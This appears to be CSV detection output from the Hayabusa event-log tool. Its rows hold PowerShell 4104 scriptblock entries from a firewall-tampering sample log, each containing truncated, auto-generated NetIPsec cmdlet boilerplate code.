[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, 
$false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 
'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 
'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetA",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and 
(@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetA",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 
'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; 